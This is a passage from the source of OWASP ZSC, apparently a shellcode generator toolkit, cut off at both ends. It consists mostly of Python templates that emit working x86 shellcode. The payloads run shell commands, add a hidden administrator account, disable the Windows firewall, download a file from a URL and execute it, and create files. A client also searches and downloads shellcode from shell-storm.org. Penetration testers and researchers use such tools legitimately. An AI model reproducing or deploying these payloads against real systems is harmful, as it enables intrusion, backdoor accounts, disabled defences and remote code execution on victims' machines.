%%esp,%%edx 18 | %s 19 | push %%edx 20 | push $0xf 21 | pop %%eax 22 | push $0x2a 23 | int $0x80 24 | mov $0x01,%%al 25 | mov $0x01,%%bl 26 | int $0x80 27 | ''' % (file, perm_num) 28 | 29 | 30 | def run(data): 31 | file_to_perm, perm_num = data[0], data[1] 32 | return chmod( 33 | stack.generate(file_to_perm, '%ebx', 'string'), 34 | stack.generate(perm_num, '%ecx', 'int')) 35 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def exc(file_to_exec): 13 | return """ 14 | %s 15 | mov %%esp,%%ebx 16 | xor %%eax,%%eax 17 | push %%eax 18 | mov %%esp,%%edx 19 | push %%ebx 20 | mov %%esp,%%ecx 21 | push %%edx 22 | push %%ecx 23 | push %%ebx 24 | mov $0x3b,%%al 25 | push $0x2a 26 | int $0x80 27 | mov $0x1,%%al 28 | mov $0x1,%%bl 29 | int $0x80 30 | """ % file_to_exec 31 | 32 | 33 | def run(data): 34 | file_to_exec = data[0] 35 | return exc(stack.generate(file_to_exec, '%ebx', 'string')) 36 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/system.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def sys(command_to_execute): 13 | return """ 14 | %s 15 | mov %%esp,%%ecx 16 | push $0x632d9090 17 | pop %%edx 18 | shr $0x10,%%edx 19 | push %%edx 20 | mov %%esp,%%edx 21 | push $0x68732f90 22 | pop %%ebx 23 | shr $0x8,%%ebx 24 | push %%ebx 25 | push $0x6e69622f 26 | mov %%esp,%%ebx 27 | xor %%eax,%%eax 28 | push %%eax 29 | push %%ecx 30 | push %%edx 31 | push %%ebx 32 | mov %%esp,%%ecx 33 | xor %%edx,%%edx 34 | push %%edx 35 | push %%ecx 36 | push %%ebx 37 | mov $0x3b,%%al 38 | push $0x2a 39 | int $0x80 40 | mov $0x1,%%al 41 | mov $0x1,%%bl 42 | int $0x80 43 | """ % command_to_execute 44 | 45 | 46 | def run(data): 47 | command = data[0] 48 | if command.find(" ") >= 0: 49 | command = command.replace('[space]', ' ') 50 | if int(len(command)) < 5: 51 | command = str( 52 | command) + '[space]&&[space]echo[space]1[space]>[space]/dev/null' # bypass a bug in here, fix later 53 | # bug in line 12 & 13, check later 54 | return sys(stack.generate( 55 | command.replace('[space]', ' '), '%ecx', 'string')) 56 | else: 57 | return sys(stack.generate(command, '%ecx', 'string')) 58 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/add_admin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def add_admin(command_hex, command): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | mov $0x61636578,%ecx 52 | push %ecx 53 | subl $0x61,0x3(%esp) 54 | push $0x456e6957 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x8,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | inc %ecx 68 | push %ecx 69 | push %ebx 70 | call *%eax 71 | add ${1},%esp 72 | pop %edx 73 | pop %ebx 74 | xor %ecx,%ecx 75 | mov $0x61737365,%ecx 76 | push %ecx 77 | subl $0x61,0x3(%esp) 78 | push $0x636f7250 79 | push $0x74697845 80 | push %esp 81 | push %ebx 82 | call *%edx 83 | xor %ecx,%ecx 84 | push %ecx 85 | call *%eax 86 | '''.format(command_hex, hex(int(8 + 4 * (ceil(len(command) / float(4)))))) 87 | 88 | 89 | def run(data): 90 | username = data[0] 91 | passsword = data[1] 92 | command = "cmd.exe /c net user " + username + " " + passsword + " /add && net localgroup administrators " + username + " /add" 93 | return add_admin(stack.generate(command, "%ecx", "string"), command) 94 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/create_file.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def create_file(create_command): 13 | return ''' 14 | xor %ecx,%ecx 15 | mov %fs:0x30(%ecx),%eax 16 | mov 0xc(%eax),%eax 17 | mov 0x14(%eax),%esi 18 | lods %ds:(%esi),%eax 19 | xchg %eax,%esi 20 | lods %ds:(%esi),%eax 21 | mov 0x10(%eax),%ebx 22 | mov 0x3c(%ebx),%edx 23 | add %ebx,%edx 24 | mov 0x78(%edx),%edx 25 | add %ebx,%edx 26 | mov 0x20(%edx),%esi 27 | add %ebx,%esi 28 | xor %ecx,%ecx 29 | inc %ecx 30 | lods %ds:(%esi),%eax 31 | add %ebx,%eax 32 | cmpl $0x50746547,(%eax) 33 | jne 23 <.text+0x23> 34 | cmpl $0x41636f72,0x4(%eax) 35 | jne 23 <.text+0x23> 36 | cmpl $0x65726464,0x8(%eax) 37 | jne 23 <.text+0x23> 38 | mov 0x24(%edx),%esi 39 | add %ebx,%esi 40 | mov (%esi,%ecx,2),%cx 41 | dec %ecx 42 | mov 0x1c(%edx),%esi 43 | add %ebx,%esi 44 | mov (%esi,%ecx,4),%edx 45 | add %ebx,%edx 46 | xor %esi,%esi 47 | mov %edx,%esi 48 | xor %ecx,%ecx 49 | push %ecx 50 | push $0x41797261 51 | push $0x7262694c 52 | push $0x64616f4c 53 | push %esp 54 | push %ebx 55 | call *%edx 56 | xor %ecx,%ecx 57 | mov $0x6c6c,%cx 58 | push %ecx 59 | push $0x642e7472 60 | push $0x6376736d 61 | push %esp 62 | call *%eax 63 | xor %edi,%edi 64 | mov %eax,%edi 65 | xor %edx,%edx 66 | push %edx 67 | mov $0x6d65,%dx 68 | push %edx 69 | push $0x74737973 70 | mov %esp,%ecx 71 | push %ecx 72 | push %edi 73 | xor %edx,%edx 74 | mov %esi,%edx 75 | call *%edx 76 | xor %ecx,%ecx 77 | {0} 78 | push %esp 79 | call *%eax 80 | xor %edx,%edx 81 | push %edx 82 | push $0x74697865 83 | mov %esp,%ecx 84 | push %ecx 85 | push %edi 86 | call *%esi 87 | xor %ecx,%ecx 88 | push %ecx 89 | call *%eax 90 | '''.format(create_command) 91 | 92 | 93 | def run(data): 94 | file_to_create = data[0] 95 | file_content = data[1] 96 | return create_file(stack.generate("echo " + file_content + ">" + 97 | file_to_create, "%ecx", "string")) 98 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/dir_create.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def dir_create(directory_to_create, dir_name): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | push $0x4179726f 52 | push $0x74636572 53 | push $0x69446574 54 | push $0x61657243 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x10,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | push %ecx 68 | push %ebx 69 | call *%eax 70 | add ${1},%esp 71 | pop %edx 72 | pop %ebx 73 | xor %ecx,%ecx 74 | mov $0x61737365,%ecx 75 | push %ecx 76 | subl $0x61,0x3(%esp) 77 | push $0x636f7250 78 | push $0x74697845 79 | push %esp 80 | push %ebx 81 | call *%edx 82 | xor %ecx,%ecx 83 | push %ecx 84 | call *%eax 85 | '''.format(directory_to_create, 86 | hex(int(8 + 4 * (ceil(len(dir_name) / float(4)))))) 87 | 88 | 89 | def run(data): 90 | directory_to_create = data[0] 91 | return dir_create( 92 | stack.generate(directory_to_create, "%ecx", "string"), 93 | directory_to_create) 94 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/disable_firewall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def disable_firewall(command): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | mov $0x61636578,%ecx 52 | push %ecx 53 | subl $0x61,0x3(%esp) 54 | push $0x456e6957 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x8,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | inc %ecx 68 | push %ecx 69 | push %ebx 70 | call *%eax 71 | add $0x2c,%esp 72 | pop %edx 73 | pop %ebx 74 | xor %ecx,%ecx 75 | mov $0x61737365,%ecx 76 | push %ecx 77 | subl $0x61,0x3(%esp) 78 | push $0x636f7250 79 | push $0x74697845 80 | push %esp 81 | push %ebx 82 | call *%edx 83 | xor %ecx,%ecx 84 | push %ecx 85 | call *%eax 86 | '''.format(command) 87 | 88 | 89 | def run(data): 90 | command = "netsh firewall set opmode disable" 91 | return disable_firewall(stack.generate(command, "%ecx", "string")) 92 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/download_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def download_exec(url, filename): 13 | return ''' 14 | xor %ecx,%ecx 15 | mov %fs:0x30(%ecx),%eax 16 | mov 0xc(%eax),%eax 17 | mov 0x14(%eax),%esi 18 | lods %ds:(%esi),%eax 19 | xchg %eax,%esi 20 | lods %ds:(%esi),%eax 21 | mov 0x10(%eax),%ebx 22 | mov 0x3c(%ebx),%edx 23 | add %ebx,%edx 24 | mov 0x78(%edx),%edx 25 | add %ebx,%edx 26 | mov 0x20(%edx),%esi 27 | add %ebx,%esi 28 | xor %ecx,%ecx 29 | inc %ecx 30 | lods %ds:(%esi),%eax 31 | add %ebx,%eax 32 | cmpl $0x50746547,(%eax) 33 | jne 23 <.text+0x23> 34 | cmpl $0x41636f72,0x4(%eax) 35 | jne 23 <.text+0x23> 36 | cmpl $0x65726464,0x8(%eax) 37 | jne 23 <.text+0x23> 38 | mov 0x24(%edx),%esi 39 | add %ebx,%esi 40 | mov (%esi,%ecx,2),%cx 41 | dec %ecx 42 | mov 0x1c(%edx),%esi 43 | add %ebx,%esi 44 | mov (%esi,%ecx,4),%edx 45 | add %ebx,%edx 46 | xor %esi,%esi 47 | mov %edx,%esi 48 | xor %ecx,%ecx 49 | push %ecx 50 | push $0x41797261 51 | push $0x7262694c 52 | push $0x64616f4c 53 | push %esp 54 | push %ebx 55 | call *%edx 56 | xor %ecx,%ecx 57 | mov $0x6c6c,%cx 58 | push %ecx 59 | push $0x642e6e6f 60 | push $0x6d6c7275 61 | push %esp 62 | call *%eax 63 | xor %ecx,%ecx 64 | push %ecx 65 | mov $0x4165,%cx 66 | push %ecx 67 | push $0x6c69466f 68 | push $0x5464616f 69 | push $0x6c6e776f 70 | push $0x444c5255 71 | mov %esp,%ecx 72 | push %ecx 73 | push %eax 74 | call *%esi 75 | xor %ecx,%ecx 76 | push %ecx 77 | {0} 78 | xor %edi,%edi 79 | mov %esp,%edi 80 | xor %ecx,%ecx 81 | push %ecx 82 | {1} 83 | xor %edx,%edx 84 | mov %esp,%edx 85 | xor %ecx,%ecx 86 | push %ecx 87 | push %ecx 88 | push %edx 89 | push %edi 90 | push %ecx 91 | call *%eax 92 | xor %ecx,%ecx 93 | push %ecx 94 | push $0x63657890 95 | pop %ecx 96 | shr $0x8,%ecx 97 | push %ecx 98 | push $0x456e6957 99 | xor %ecx,%ecx 100 | push %esp 101 | push %ebx 102 | call *%esi 103 | xor %ecx,%ecx 104 | push %ecx 105 | {1} 106 | xor %edx,%edx 107 | mov %esp,%edx 108 | inc %ecx 109 | push %ecx 110 | push %edx 111 | call *%eax 112 | xor %ecx,%ecx 113 | push %ecx 114 | push $0x73736590 115 | pop %ecx 116 | shr $0x8,%ecx 117 | push %ecx 118 | push $0x636f7250 119 | push $0x74697845 120 | push %esp 121 | push %ebx 122 | call *%esi 123 | xor %ecx,%ecx 124 | push %ecx 125 | call *%eax 126 | '''.format(url, filename) 127 | 128 | 129 | def run(data): 130 | url = data[0] 131 | filename = data[1] 132 | return download_exec( 133 | stack.generate(url, "%ecx", "string"), stack.generate(filename, "%ecx", 134 | "string")) 135 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/download_tofile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def download_tofile(url, filename): 13 | return ''' 14 | xor %ecx,%ecx 15 | mov %fs:0x30(%ecx),%eax 16 | mov 0xc(%eax),%eax 17 | mov 0x14(%eax),%esi 18 | lods %ds:(%esi),%eax 19 | xchg %eax,%esi 20 | lods %ds:(%esi),%eax 21 | mov 0x10(%eax),%ebx 22 | mov 0x3c(%ebx),%edx 23 | add %ebx,%edx 24 | mov 0x78(%edx),%edx 25 | add %ebx,%edx 26 | mov 0x20(%edx),%esi 27 | add %ebx,%esi 28 | xor %ecx,%ecx 29 | inc %ecx 30 | lods %ds:(%esi),%eax 31 | add %ebx,%eax 32 | cmpl $0x50746547,(%eax) 33 | jne 23 <.text+0x23> 34 | cmpl $0x41636f72,0x4(%eax) 35 | jne 23 <.text+0x23> 36 | cmpl $0x65726464,0x8(%eax) 37 | jne 23 <.text+0x23> 38 | mov 0x24(%edx),%esi 39 | add %ebx,%esi 40 | mov (%esi,%ecx,2),%cx 41 | dec %ecx 42 | mov 0x1c(%edx),%esi 43 | add %ebx,%esi 44 | mov (%esi,%ecx,4),%edx 45 | add %ebx,%edx 46 | xor %esi,%esi 47 | mov %edx,%esi 48 | xor %ecx,%ecx 49 | push %ecx 50 | push $0x41797261 51 | push $0x7262694c 52 | push $0x64616f4c 53 | push %esp 54 | push %ebx 55 | call *%edx 56 | xor %ecx,%ecx 57 | mov $0x6c6c,%cx 58 | push %ecx 59 | push $0x642e6e6f 60 | push $0x6d6c7275 61 | push %esp 62 | call *%eax 63 | xor %ecx,%ecx 64 | push %ecx 65 | mov $0x4165,%cx 66 | push %ecx 67 | push $0x6c69466f 68 | push $0x5464616f 69 | push $0x6c6e776f 70 | push $0x444c5255 71 | mov %esp,%ecx 72 | push %ecx 73 | push %eax 74 | call *%esi 75 | xor %ecx,%ecx 76 | push %ecx 77 | {0} 78 | xor %edi,%edi 79 | mov %esp,%edi 80 | xor %ecx,%ecx 81 | push %ecx 82 | {1} 83 | xor %edx,%edx 84 | mov %esp,%edx 85 | xor %ecx,%ecx 86 | push %ecx 87 | push %ecx 88 | push %edx 89 | push %edi 90 | push %ecx 91 | call *%eax 92 | xor %ecx,%ecx 93 | push %ecx 94 | push $0x73736590 95 | pop %ecx 96 | shr $0x8,%ecx 97 | push %ecx 98 | push $0x636f7250 99 | push $0x74697845 100 | push %esp 101 | push %ebx 102 | call *%esi 103 | xor %ecx,%ecx 104 | push %ecx 105 | call *%eax 106 | '''.format(url, filename) 107 | 108 | 109 | def run(data): 110 | url = data[0] 111 | filename = data[1] 112 | return download_tofile( 113 | stack.generate(url, "%ecx", "string"), stack.generate(filename, "%ecx", 114 | "string")) 115 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def exc(file_to_exec, file_name): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | mov $0x61636578,%ecx 52 | push %ecx 53 | subl $0x61,0x3(%esp) 54 | push $0x456e6957 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x8,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | inc %ecx 68 | push %ecx 69 | push %ebx 70 | call *%eax 71 | add ${1},%esp 72 | pop %edx 73 | pop %ebx 74 | xor %ecx,%ecx 75 | mov $0x61737365,%ecx 76 | push %ecx 77 | subl $0x61,0x3(%esp) 78 | push $0x636f7250 79 | push $0x74697845 80 | push %esp 81 | push %ebx 82 | call *%edx 83 | xor %ecx,%ecx 84 | push %ecx 85 | call *%eax 86 | '''.format(file_to_exec, hex(int(8 + 4 * (ceil(len(file_name) / float(4)))))) 87 | 88 | 89 | def run(data): 90 | file_to_exec = data[0] 91 | return exc(stack.generate(file_to_exec, "%ecx", "string"), file_to_exec) 92 | -------------------------------------------------------------------------------- /lib/generator/windows_x86_64/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/windows_x86_64/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def exc(file_to_exec, file_name): 14 | return ''' 15 | sub $0x20,%rsp 16 | and $0xfffffffffffffff0,%rsp 17 | mov %gs:0x60,%r12 18 | mov 0x18(%r12),%r12 19 | mov 0x20(%r12),%r12 20 | mov (%r12),%r12 21 | mov 0x20(%r12),%r15 22 | mov (%r12),%r12 23 | mov 0x20(%r12),%r12 24 | mov $0xe8afe98,%rdx 25 | mov %r12,%rcx 26 | mov %r12,%r12 27 | callq 0x401067 28 | jmp 0x401059 29 | pop %rcx 30 | mov $0x1,%edx 31 | callq *%rax 32 | mov $0x2d3fcd70,%edx 33 | mov %r15,%rcx 34 | callq 0x401067 35 | xor %rcx,%rcx 36 | callq *%rax 37 | callq 0x40103f 38 | movslq 0x6c(%rcx),%esp 39 | movslq (%rsi),%ebp 40 | gs js 0x4010cb 41 | add %cl,-0x77(%rcx) 42 | int $0x67 43 | mov 0x3c(%r13),%eax 44 | mov 0x88(%r13d,%eax,1),%r14d 45 | add %r13d,%r14d 46 | mov 0x18(%r14d),%r10d 47 | mov 0x20(%r14d),%ebx 48 | add %r13d,%ebx 49 | jecxz 0x4010ca 50 | dec %r10d 51 | mov (%ebx,%r10d,4),%esi 52 | add %r13d,%esi 53 | xor %edi,%edi 54 | xor %eax,%eax 55 | cld 56 | lodsb %ds:(%rsi),%al 57 | test %al,%al 58 | je 0x4010a7 59 | ror $0xd,%edi 60 | add %eax,%edi 61 | jmp 0x40109b 62 | cmp %edx,%edi 63 | jne 0x401088 64 | mov 0x24(%r14d),%ebx 65 | add %r13d,%ebx 66 | xor %ecx,%ecx 67 | mov (%ebx,%r10d,2),%cx 68 | mov 0x1c(%r14d),%ebx 69 | add %r13d,%ebx 70 | mov (%ebx,%ecx,4),%eax 71 | add %r13d,%eax 72 | retq 73 | add %al,(%rax) 74 | add %al,(%rax) 75 | '''.format(file_to_exec, hex(int(8 + 4 * (ceil(len(file_name) / float(4)))))) 76 | 77 | 78 | def run(data): 79 | file_to_exec = data[0] 80 | return exc(stack.generate(file_to_exec, "%rcx", "string"), file_to_exec) 81 | -------------------------------------------------------------------------------- /lib/opcoder/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/shell_storm_api/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/shell_storm_api/grab.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core.compatible import * 10 | from core.alert import * 11 | from core import color 12 | from core.get_input import _input 13 | from core.file_out import downloaded_file_output 14 | if version() is 2: 15 | from urllib import urlopen 16 | from HTMLParser import HTMLParser 17 | if version() is 3: 18 | from urllib.request import urlopen 19 | import html 20 | 21 | def _html_decode(data): 22 | """HTML Decode function separate to handle py2 and py3.""" 23 | if version() is 2: 24 | h = HTMLParser() 25 | return h.unescape(data) 26 | if version() is 3: 27 | return html.unescape(data) 28 | 29 | def _search_shellcode(cli,keyword): 30 | url = 'http://shell-storm.org/api/?s=' 31 | if cli is True: 32 | pass 33 | else: 34 | keyword = _input('%skeyword_to_search%s' % 35 | (color.color('blue'), color.color('yellow')), 'any', True) 36 | keyword = keyword.replace(' ', '*') 37 | try: 38 | data = urlopen(url + keyword).read() 39 | if version() is 3: 40 | data = data.decode('utf-8') 41 | except: 42 | warn('connection error') 43 | return 44 | for shellcode_ in data.rsplit('\n'): 45 | try: 46 | shellcode_ = shellcode_.rsplit('::::') 47 | info('author: %s\tshellcode_id: %s\tplatform: %s\ttitle: %s\n' % 48 | (shellcode_[0], shellcode_[3], shellcode_[1], shellcode_[2])) 49 | except: 50 | pass 51 | write('\n') 52 | 53 | 54 | def _download_shellcode(cli,id,name): 55 | if cli is True: 56 | pass 57 | else: 58 | id = _input('%sshellcode_id%s' % 59 | (color.color('blue'), color.color('yellow')), 'int', True) 60 | url = 'http://shell-storm.org/shellcode/files/shellcode-%s.php' % 